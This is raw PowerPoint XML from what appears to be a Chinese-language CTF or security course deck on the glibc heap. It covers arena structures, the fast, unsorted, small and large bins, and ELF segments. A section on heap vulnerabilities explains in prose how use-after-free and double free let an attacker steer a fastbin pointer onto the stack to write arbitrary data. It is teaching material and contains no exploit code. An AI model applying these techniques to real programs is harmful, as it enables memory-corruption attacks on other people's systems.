              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next_free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Number of threads attached to this arena.  0 if the arena is on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       the free list.  Access to this field is serialized by</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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free_list_lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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arena.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attached_threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Memory allocated from the system in this arena.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system_mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max_system_mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200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1C78366-619B-44FA-9510-545D5A34DDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042622" y="876500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b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>main arena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>并不是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>heap segment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的一部分，而是一个全局变量，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>存储在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>libc.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的数据段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523F55C-3161-4D65-9A0D-F7DD3E8609D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3621741667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1C8C7642-9C56-484D-95DD-7187DE921B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="1189173"/>
            <a:ext cx="820888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fastbinsY[] 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单向列表 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LIFO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管理 16、24、32、40、48、56、64 Bytes 的 free chunks（32位下默认） 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其中的 chunk 的 in_use 位（下一个物理相邻的 chunk 的 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 位）总为1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E06066D-4903-4C94-9D92-567420132954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="507697"/>
            <a:ext cx="194636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fast bins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3506D7E-9A28-4AB6-B7F0-4243F3167C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin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3259242-7560-532B-7E5F-F961C00F90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000" y="2845722"/>
            <a:ext cx="4939373" cy="3766838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45531B35-5E8B-DA7D-FF0B-86674B00E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850171" y="3856173"/>
            <a:ext cx="46654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f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指针指向下一个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chunk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的开头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malloc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指针指向的是控制结构后的部分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3950015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8AA3423E-D26A-4D61-B735-880C2E35617D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6404" y="1180729"/>
            <a:ext cx="8259191" cy="4984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136EBD71-D5CC-48A8-B4EA-50509E2A87DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464150151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1B19B9D2-E81C-4A50-BEFA-22C553774865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643433" y="1539822"/>
            <a:ext cx="283885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unsorted bin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F3F1C11-1C60-41DD-A4C0-E6D71CCFBACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3105835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bins[1] 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管理刚刚释放还为分类的 chunk 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可以视为空闲 chunk 回归其所属 bin 之前的缓冲区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02F5155-CCDA-4138-8E71-BE515062945D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2286030878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D3EDE1F8-41AC-4DC1-8858-1FFD79A35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4274" y="1047564"/>
            <a:ext cx="2509051" cy="5282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C69B62FF-E40C-40B3-8800-1FBB9C991D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1653443492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8157E90F-0267-4022-B321-62FA4C046419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770962" y="1264613"/>
            <a:ext cx="225574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small bins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D6FAAC94-2F4B-4101-8795-63C98FF9521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657383" y="2452430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bins[2] ~ bins[63] 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62 个循环双向链表 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FIFO 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管理 16、24、32、40、 …… 、504 Bytes 的 free chunks（32位下） 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每个链表中存储的 chunk 大小都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一致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C51E43A-4C23-4FED-ADC5-804EF0409CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1114800864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772839B9-CBD0-4DCC-B02A-F3EEEB3A75DF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2015" y="1305017"/>
            <a:ext cx="8347969" cy="4672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416DEC51-BC3A-4C5B-9916-F4D64FB06105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232969182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0E5B274E-E36B-4EBA-86E1-5EA5962B67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857984" y="1898496"/>
            <a:ext cx="221368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large bins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6D2B144C-D0C6-4E1B-92DA-5ADBF4C9050C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2993994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bins[64] ~ bins[126] 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63 个循环双向链表 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FIFO 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管理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大于 504 Bytes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 free chunks（32位下）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393F144-696B-4A1D-BFF1-485A10227B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718549020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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60D632D3-CF1D-47B9-B3C1-57A9226577CC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0846" y="1340528"/>
            <a:ext cx="7670307" cy="4687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E0A9E235-3D83-4540-A4BE-A6FDDAFF3228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3485457680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B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆分配策略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0BCD27FF-FF99-4018-9FD7-EB6A7EDBE3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2274838"/>
            <a:ext cx="6096000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它根据用户申请的内存块大小以及相应大小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chunk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通常使用的频度（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fastbin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chunk, small chunk, large chunk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），依次实现了不同的分配方法。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它由小到大依次检查不同的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bin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中是否有相应的空闲块可以满足用户请求的内存。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当所有的空闲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chunk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都无法满足时，它会考虑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top chunk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当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top chunk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也无法满足时，堆分配器才会进行内存块申请。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0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0C074A4-3B2E-4B4C-801F-36747A181627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677254" y="1161649"/>
            <a:ext cx="154882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malloc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77497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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588303" y="1034283"/>
            <a:ext cx="46746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段（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segment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）与节（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section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ED34666-3964-462A-8D09-714EA26650EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902731" y="1773179"/>
            <a:ext cx="479128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一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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段 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包含多个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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solidFill>
                <a:srgbClr val="C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段视图用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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进程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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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内存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区域的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C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rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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权限划分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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solidFill>
                <a:srgbClr val="C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节视图用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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文件 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编译链接时 与 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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磁盘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上存储时 的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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文件结构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的组织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487CD6E-A5C7-4DFD-8290-7072AC2F1A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123264" y="1773179"/>
            <a:ext cx="5299079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代码段（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Text segment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）包含了代码与只读数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C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.text 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节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rodata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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.hash 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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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dynsym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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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dynstr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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C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plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rel.got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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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……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数据段（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Data segment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）包含了可读可写数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.data 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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.dynamic 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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.got 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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C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got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C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bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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节 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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……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栈段（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Stack segment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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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14C381E-7298-4686-8607-7A7C570B311A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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24131183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B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆分配策略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0C074A4-3B2E-4B4C-801F-36747A181627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677254" y="1161649"/>
            <a:ext cx="100181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free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1271867-D3AA-4615-93FE-9110E7A18FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2274838"/>
            <a:ext cx="6096000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它将用户暂且不用的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chunk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回收给堆管理器，适当的时候还会归还给操作系统。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它依据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chunk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大小来优先试图将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free chunk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链入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tcache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或者是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fast bin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。不满足则链入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usorted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bin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在条件满足时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free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函数遍历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usorted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bin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并将其中的物理相邻的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free chunk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合并，将相应大小的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chunk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分类放入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small bin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或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large bin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除了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tcache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chunk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与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fast bin chunk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，其它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chunk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free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时会与其物理相邻的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free chunk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合并</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0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04632803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1A664487-70CF-BB4D-BC02-ECD04A5EE82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1202783"/>
            <a:ext cx="6096000" cy="5078313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use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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free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free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掉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chunk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后，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chunk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进入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unsorted bins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，再次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malloc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类似大小的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chunk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，将大概率从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unsorted bins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中取出之前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free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掉的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chunk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继续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use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由于每次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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并不会删除实际</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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chunk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上的数据，所以会产生安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="0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double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use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="0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申请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fastbins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的小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chunk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free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一次后，再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free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一次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fastbins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就会放入两遍这个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chunk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；然后再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malloc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一次，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fastbin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中还会有这个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chunk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，同时我们获得了一个把这个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chunk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当做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malloced chunk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的指针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这是由于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虽然内存会被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free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掉，但是指向内存的指针还可以继续使用，如果修改该指针指向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chunk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fd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地址，就可以使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fast bins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中的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chunk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中的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fd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指针指向栈上，实现在栈上写入任意数据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可能存在两个指针都指向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一个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chunk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的情况，权限低的指针和权限高的指针都可能指向同一个内存区域</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0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43936552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490C488-4A79-4D5B-8F05-235A9DD4A0FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="593515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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7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AWD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7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CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2485559" y="2120130"/>
            <a:ext cx="548906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堆管理器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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堆概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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Areana</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Chunk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堆漏洞与其利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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00084697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B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
